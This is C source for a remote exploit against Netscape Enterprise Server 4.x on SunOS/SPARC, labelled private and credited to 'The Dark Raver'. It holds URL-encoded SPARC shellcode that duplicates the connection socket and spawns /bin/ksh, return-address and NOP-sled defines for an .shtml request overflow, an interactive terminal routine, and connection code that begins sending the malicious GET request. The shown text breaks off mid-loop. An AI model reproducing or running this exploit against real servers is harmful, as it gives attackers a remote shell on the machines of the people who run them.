/* * PRIVATE DO NOT DISTRIBUTE - Only for t0s exploit * * Netscape Enterprise Server 4.x remote exploit * Abusing .shtml request overflow * * Tested against SunOS 5.7 sun4u sparc SUNW,Ultra-5_10 * Must compile on most gcc OS * * The Dark Raver */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include int debug=1; char hell[]= /* search the socket */ "%aa%1d%40%15" // xor %l5, %l5, %l5 "%ac%05%64%02" // add %l5, 1026, %l6 "%ac%25%a0%01" // dec %l6 "%90%05%40%16" // add %l5, %l6 , %o0 "%82%10%20%f3" // mov 0xf3, %g1 "%91%d0%20%08" // ta 8 "%90%22%20%01" // dec %o0 - getpeername() "%80%a2%3f%ff" // cmp %o0, -1 "%12%bf%ff%fa" // be -6 /* dup2(sock,0) */ "%aa%1d%40%15" // xor %l5, %l5, %l5 "%90%05%40%16" // add %l5, %l6, %o0 "%92%10%20%09" // mov 9, %o1 "%94%22%40%09" // sub %o1, %o1, %o2 "%82%10%20%3e" // mov 0x3e, %g1 "%91%d0%20%08" // ta 8 /* dup2(sock,1) */ "%aa%1d%40%15" // xor %l5, %l5, %l5 "%90%05%40%16" // add %l5, %l6, %o0 "%92%10%20%09" // mov 9, %o1 "%94%05%60%01" // add %l5, 1, %o2 "%82%10%20%3e" // mov 0x3e, %g1 "%91%d0%20%08" // ta 8 /* dup2(sock,2) */ "%aa%1d%40%15" // xor %l5, %l5, %l5 "%90%05%40%16" // add %l5, %l6, %o0 "%92%10%20%09" // mov 9, %o1 "%94%05%60%02" // add %l5, 2, %o2 "%82%10%20%3e" // mov 0x3e, %g1 "%91%d0%20%08" // ta 8 /* execve("/bin/ksh") */ "%20%bf%ff%ff" // bn,a "%20%bf%ff%ff" // bn,a "%7f%ff%ff%ff" // call "%90%03%e0%24" // add %o7, 32, %o0 "%92%02%20%10" // add %o0, 16, %o1 "%98%03%e0%24" // add %o7, 32, %o4 "%c0%23%20%08" // st %g0, [%o4+8] "%d0%23%20%10" // st %o0, [%o4+16] "%c0%23%20%14" // st %g0, [%o4+20] "%82%20%3f%f5" // sub %g0, -0xb, g1 "%91%d0%20%08" // ta 8 "/bin/ksh"; //0xf99e1360 #define OFFSET "%%f9%%9e%%13%%40" #define OFFSET2 "%%f9%%9e%%13%%60" #define NOPNUM 40 #define NOP "%%80%%1b%%c0%%1f" #define ALIGN 2 #define EXTRA 1000 #define CUTREPAD 932 void terminal(int s) { char buf[1024]; fd_set rfds; fd_set fds; int i; printf("Entering terminal...\n"); FD_ZERO(&fds); FD_SET(0,&fds); FD_SET(s,&fds); while(1) { memcpy(&rfds,&fds,sizeof(fds)); i=select(s+1,&rfds,NULL,NULL,NULL); if (i==-1) { printf("Select()\n"); exit(0); } if (i==0) { printf("Session closed\n"); exit(0); } if (FD_ISSET(s,&rfds)) { if ((i=read(s,buf,sizeof(buf)))<1) { printf("Session closed\n"); exit(0); } write(1,buf,i); } if (FD_ISSET(0,&rfds)) { if ((i=read(0,buf,sizeof(buf)))<1) { printf("Session closed\n"); exit(0); } write(s,buf,i); } } } main(int argc, char **argv) { int sock; struct sockaddr_in sa; struct hostent *hp; int c; int i; int x; extern int optind; extern char *optarg; int len; int padd; char cbuf[4000]; if(argc<3) { printf("Usage: ns4x \n"); exit(-1); } optind+=2; while((x = getopt(argc, argv, "o:n:a:f:")) != EOF) { switch (x) { default: printf("Too busy to code this :) sorry... maybe next time...\n"); } } if((hp=(struct hostent *)gethostbyname(argv[1]))==NULL) { perror("gethostbyname()"); exit(0); } if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) { perror("socket()"); exit(0); } sa.sin_family=AF_INET; sa.sin_port=htons(atoi(argv[2])); memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length); if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=0) { perror("connect()"); exit(0); } printf("Connected to %s\n",argv[1]); printf("Sending codez\n"); sprintf(cbuf, "GET /"); write(sock, cbuf, strlen(cbuf)); if(debug) printf("%s", cbuf); for(i=0;i